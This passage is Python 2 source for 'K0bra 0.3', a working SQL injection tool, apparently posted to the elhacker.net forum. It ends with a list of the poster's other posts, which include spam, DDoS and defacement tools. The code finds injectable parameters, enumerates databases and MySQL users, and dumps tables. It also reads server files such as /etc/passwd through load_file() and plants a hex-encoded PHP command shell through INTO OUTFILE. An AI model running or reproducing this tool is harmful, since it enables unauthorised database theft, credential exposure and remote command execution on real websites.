re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) print "\n\n[+] Searching DBS\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] DBS Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): db = re.findall("K0BRA(.*?)K0BRA",code2) db = db[0] print "[DB Found] : "+db savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db) else: print "[-] Not Found\n" def men(): print "\n[+] Press any key to continue\n" raw_input() menu(page,bypass) def fuzz(web,bypassx): print "\n[+] Fuzzing files with load_file()\n" pass1,pass2 = bypass(bypassx) for archivos in files: nombre = archivos file = "0x"+str(binascii.hexlify(archivos)) web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web) code = toma(web1) if (re.findall("k0bra(.*?)k0bra",code,re.S)): algo = re.findall("k0bra(.*?)k0bra",code,re.S) print "\n[File Found] : ",nombre print "\n[Source Start]\n" print algo[0] print "\n[Source End]" savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre) savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n") savefile("logs/"+gethost(web)+".txt",algo[0]) savefile("logs/"+gethost(web)+".txt","\n[Source End]") print "\n[+] Finished\n" def fuzzfile(web,bypassx): pass1,pass2 = bypass(bypassx) archivos = raw_input("\n[File To load] : ") nombre = archivos file = "0x"+str(binascii.hexlify(archivos)) web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web) code = toma(web1) if (re.findall("k0bra(.*?)k0bra",code,re.S)): algo = re.findall("k0bra(.*?)k0bra",code,re.S) print "\n\n[File Found] : ",nombre print "\n[Source Start]\n" print algo[0] print "\n[Source End]" savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre) savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n") savefile("logs/"+gethost(web)+".txt",algo[0]) savefile("logs/"+gethost(web)+".txt","\n[Source End]") else: print "\n\n[-] Error" def into(web,passx): pass1,pass2 = bypass(passx) dira = raw_input("\n\n[Full Source Discloure] : ") diro = raw_input("\n[Directory to test] : ") linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e" lugar = dira+"/cmd.php" lugardos = diro+"/cmd.php" webtest = "http://"+gethost(web)+lugardos web1 = re.sub("hackman",linea,web) formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2 toma(formandoweb) code = toma(webtest) if (re.findall("Mini Shell By Doddy",code)): print "\n\n[shell up] : "+webtest savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest) else: print "\n\n[-] Error" def menu(page,bypass): clean() header() print "\n[+] Target : ",page,"\n" print "\n[information_schema]\n" print "1 - Show tables" print "2 - Show columns of the a table" print "3 - Show databases" print "4 - Show tables from the a DB" print "5 - Show columns from the a table of the DB" print "\n[mysql.user]\n" print "6 - Show users" print "\n[Others]\n" print "7 - Show details" print "8 - Dump data" print "9 - Fuzz Files with load_file" print "10 - Load files with load_file" print "11 - Create Shell" print "12 - Show log" print "13 - Change target" print "14 - Exit\n\n" try: op = input("[Option] : ") if op == 1: showtables(page,bypass) men() elif op == 2: table = raw_input("\n\n[Table] : ") showcolumns(table,page,bypass) men() elif op == 3: showdbs(page,bypass) men() elif op == 4: db = raw_input("\n\n[DB] : ") showtablesdb(page,db,bypass) men() elif op == 5: db = raw_input("\n\n[DB] : ") table = raw_input("\n\n[Table] : ") showcolumnsdb(page,db,table,bypass) men() elif op == 6: mysqluser(page,bypass) men() elif op == 7: more(page,bypass) men() elif op == 8: table = raw_input("\n\n[Table] : ") col1 = raw_input("\n\n[Column 1] : ") col2 = raw_input("\n\n[Column 2] : ") dumper(page,bypass,table,col1,col2) men() elif op == 9: fuzz(page,bypass) men() elif op == 10: fuzzfile(page,bypass) men() elif op == 11: into(page,bypass) men() elif op == 12: os.system("start logs/"+gethost(page)+".txt") menu(page,bypass) elif op == 13: sta() elif op == 14: sys.exit(1) else: menu(page,bypass) except: menu(page,bypass) def more(web,passx): pass1,pass2 = bypass(passx) otraweb = web print "\n[+] Searching more data\n" hextest = "0x2f6574632f706173737764" web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web) web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb) code0 = toma(web1+pass2) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) savefile("logs/"+gethost(web)+".txt","") print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1]) savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2]) savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n") code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on") code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on") codetres = toma(web2) if (re.findall("ERTOR854",codetres)): print "[+] load_file() : on" savefile("logs/"+gethost(web)+".txt","[+] load_file() : on") def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))" for te in range(2,30): number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))" code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2) if (re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n") menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "[-] Length dont found\n" reiniciar() def scan(web,passx): pass1,pass2 = bypass(passx) print "\n\n[+] Testing vulnerability" code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2) codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2) if not code==codedos: print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" op = raw_input("\n[+] Scan anyway y/n : ") if op == "y": findlength(web,passx) elif op == "n": reiniciar() else: reiniciar() def sta(): clean() header() web = raw_input("\n\n[Page] : ") bypasx = raw_input("\n\n[Bypass] : ") if (re.findall("hackman",web,re.I)): menu(web,bypasx) else: try: scan(web,bypasx) except: print "\n[-] Web offline" reiniciar() installer() sta() #The End

Test Foro de elhacker.net SMF 2.1

Mensajes - BigBear

Scripting / [Perl] IRC Spam 0.3

Scripting / [Perl] Commander 0.3

Programación C/C++ / [C] ScanPort

Programación C/C++ / [C] ResolveIP

Programación C/C++ / [C] Manager

Programación C/C++ / [C] Iframe DDOS

Programación C/C++ / [C] Hex Converter

Scripting / [Perl] DefacerTools 0.5 (regalo de navidad)

Scripting / Re: [Perl] Commander

Scripting / [Python] K0bra 0.3